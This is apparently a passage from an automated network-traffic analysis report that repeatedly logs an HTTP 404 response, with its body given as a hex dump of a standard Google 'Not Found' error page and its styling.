                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:09:55 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:09:55 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:09:57 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:09:58 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:10:00 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:10:01 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:10:03 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 